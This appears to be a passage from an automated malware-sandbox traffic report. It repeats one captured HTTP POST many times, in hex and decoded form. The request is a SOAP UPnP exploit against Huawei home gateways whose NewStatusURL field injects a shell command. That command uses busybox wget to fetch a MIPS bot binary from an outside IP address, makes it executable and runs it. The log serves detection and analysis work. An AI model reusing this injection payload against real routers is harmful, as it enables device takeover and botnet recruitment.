55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 